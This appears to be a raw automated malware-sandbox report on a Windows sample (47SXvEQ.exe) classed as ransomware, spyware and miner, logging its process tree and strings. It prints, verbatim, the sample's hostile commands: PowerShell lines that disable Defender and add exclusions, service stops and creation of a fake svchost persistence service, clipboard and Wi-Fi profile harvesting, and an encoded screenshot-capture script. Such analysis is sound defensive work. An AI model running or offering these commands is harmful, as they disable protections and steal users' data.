Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: 47SXvEQ.exe	Static PE information: Section: ypfntliq ZLIB complexity 0.9943648107848923
Source: libcrypto-1_1.dll.4.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
Source: libssl-1_1.dll.4.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
Source: python310.dll.4.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9989605894183168
Source: sqlite3.dll.4.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9973472980934018
Source: unicodedata.pyd.4.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9940549303016454

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.mine.winEXE@207/55@4/2

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Mutant created: \Sessions\1\BaseNamedObjects\g
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03

Source: C:\Users\user\Desktop\47SXvEQ.exe

File created: C:\Users\user\AppData\Local\Temp\instals.exe

Jump to behavior

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\47SXvEQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\47SXvEQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: Built.exe	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Built.exe	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Built.exe	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Built.exe	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Built.exe	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Built.exe	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: 47SXvEQ.exe

ReversingLabs: Detection: 21%

Source: 47SXvEQ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Built.exe	String found in binary or memory: set-addPolicy
Source: Built.exe	String found in binary or memory: id-cmc-addExtensions
Source: Built.exe	String found in binary or memory: --help
Source: Built.exe	String found in binary or memory: --help
Source: Built.exe	String found in binary or memory: can't send non-None value to a just-started generator

Source: unknown	Process created: C:\Users\user\Desktop\47SXvEQ.exe "C:\Users\user\Desktop\47SXvEQ.exe"
Source: C:\Users\user\Desktop\47SXvEQ.exe	Process created: C:\Users\user\AppData\Local\Temp\instals.exe "C:\Users\user\AppData\Local\Temp\instals.exe"
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\47SXvEQ.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NPYIAYNC"
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NPYIAYNC"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: unknown	Process created: C:\ProgramData\Microsoft\svchost.exe C:\ProgramData\Microsoft\svchost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
